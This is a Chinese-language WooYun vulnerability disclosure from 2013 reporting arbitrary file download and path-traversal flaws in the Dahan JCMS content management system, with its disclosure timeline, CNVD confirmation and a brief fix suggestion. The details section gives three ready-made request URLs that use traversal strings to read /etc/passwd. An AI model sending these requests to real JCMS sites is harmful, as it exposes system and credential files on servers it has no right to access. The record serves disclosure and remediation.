漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-035794
漏洞标题:大汉版通JCMS内容管理系统任意文件下载漏洞
相关厂商:南京大汉网络有限公司
漏洞作者: 鶆鶈
提交时间:2013-09-01 16:31
修复时间:2013-11-30 16:32
公开时间:2013-11-30 16:32
漏洞类型:任意文件遍历/下载
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-09-01: 细节已通知厂商并且等待厂商处理中
2013-09-04: 厂商已经确认,细节仅向厂商公开
2013-09-07: 细节向第三方安全合作伙伴开放
2013-10-29: 细节向核心白帽子及相关领域专家公开
2013-11-08: 细节向普通白帽子公开
2013-11-18: 细节向实习白帽子公开
2013-11-30: 细节向公众公开
简要描述:
多处任意文件下载,影响版本未知,大概都影响吧。
详细说明:
1. http://target/jcms/m_5_9/sendreport/downfile.jsp?filename=/etc/passwd&savename=passwd.txt
要得到网站路径,访问:http://target/jcms/m_5_9/sendreport/,然后生成报表就看得到了。
2. http://target/jcms/m_5_e/init/comment/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd
3. http://target/jcms/m_5_e/init/guestbook/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd
这个在乌云上已经有了: WooYun: 各类政府网使用某程序导致任意文件读取
4. 其它,如一些需要权限验证的下载页面
漏洞证明:
修复方案:
限定下载目录,然后过滤".."?
版权声明:转载请注明来源 鶆鶈@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2013-09-04 22:09
厂商回复:
CNVD确认并复现所述情况,此前提交的漏洞因工作失误未及时确认,在此一并确认吧。CNVD已经对该应用软件进行特征提取,同时归入CNVD电子政务行业漏洞列表。
rank 15
最新状态:
2013-09-27:已修复。